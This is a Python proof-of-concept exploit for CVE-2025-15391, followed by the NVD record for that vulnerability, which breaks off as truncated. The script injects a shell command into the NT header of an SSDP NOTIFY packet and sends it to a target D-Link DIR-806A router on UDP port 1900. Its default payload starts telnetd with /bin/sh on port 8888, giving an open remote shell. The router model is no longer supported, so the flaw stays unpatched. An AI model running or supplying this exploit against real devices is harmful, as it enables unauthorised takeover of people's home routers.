CVE-2025-15391

#!/usr/bin/env python3 # CVE-2025-15391 PoC - D-Link DIR-806A SSDP Command Injection # This PoC demonstrates command injection in the SSDP Request Handler import socket import sys import random def generate_ssdp_notify_with_payload(payload): """ Generate malicious SSDP NOTIFY message with command injection payload """ # SSDP NOTIFY message format notify_msg = f"NOTIFY * HTTP/1.1\r\n" notify_msg += f"HOST: 239.255.255.250:1900\r\n" notify_msg += f"NT: {payload}\r\n" notify_msg += f"USN: uuid:{random.randint(1000, 9999)}::upnp:rootdevice\r\n" notify_msg += f"NTS: ssdp:alive\r\n" notify_msg += f"Cache-Control: max-age=1800\r\n" notify_msg += f"SERVER: Linux/2.6 UPnP/1.0 D-Link/1.0\r\n" notify_msg += "\r\n" return notify_msg def send_ssdp_exploit(target_ip, target_port=1900, payload=";telnetd -p 8888 -l /bin/sh"): """ Send exploit payload to target D-Link router via SSDP Args: target_ip: Target router IP address target_port: SSDP port (default 1900) payload: Command injection payload to execute Returns: bool: True if exploit sent successfully """ try: # Create UDP socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) # Generate malicious SSDP NOTIFY message ssdp_message = generate_ssdp_notify_with_payload(payload) # Send to target sock.sendto(ssdp_message.encode(), (target_ip, target_port)) print(f"[+] Exploit payload sent to {target_ip}:{target_port}") print(f"[+] Payload: {payload}") print(f"[+] Message:\n{ssdp_message}") sock.close() return True except Exception as e: print(f"[-] Error sending exploit: {str(e)}") return False def main(): if len(sys.argv) < 2: print("Usage: python3 cve-2025-15391.py <target_ip> [payload]") print("Example: python3 cve-2025-15391.py 192.168.0.1 ';telnetd -p 8888 -l /bin/sh'") print("\nNote: This PoC is for educational and authorized testing purposes only.") sys.exit(1) target_ip = sys.argv[1] payload = sys.argv[2] if len(sys.argv) > 2 else ";telnetd -p 8888 -l /bin/sh" print(f"[*] CVE-2025-15391 - D-Link DIR-806A SSDP Command Injection") print(f"[*] Target: {target_ip}") print(f"[*] Exploiting SSDP service on port 1900...") send_ssdp_exploit(target_ip, 1900, payload) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-15391", "sourceIdentifier": "[email protected]", "published": "2025-12-31T18:15:43.580", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A weakness has been identified in D-Link DIR-806A 100CNb11. Affected is the function ssdpcgi_main of the component SSDP Request Handler. This manipulation causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. This vulnerability only affects products that are no longer supported by the maintainer."}, {"lang": "es", "value": "Se ha identificado una debilidad en D-Link DIR-806A 100CNb11. Afecta a la función ssdpcgi_main del componente SSDP Request Handler. Esta manipulación provoca inyección de comandos. El ataque puede iniciarse remotamente. El exploit se ha hecho público y podría ser explotado. Esta vulnerabilidad solo afecta a productos que ya no tienen soporte por parte del mantenedor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-806a_firmware:100cnb11:*:*:*:*:*:*:*", "matchCriteriaId": "4C2FBCC5-DA27-4DC0-AE6C-91CDFB32DFB9"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-806a:-:*:*:*:*:*:*:*", "matchCriteriaId": "926B41A6-009F-444D-BE5C-B517F844E99B"}]}]}], "references": [{"url": "https://github.com/ccc-iotsec/cve-/blob/D-Link/D-Link%20DIR-806A%E6%9C%AA%E6%8E%88%E6%9D%83RCE.md", "source": "[email protected]", "tags": ... (truncated)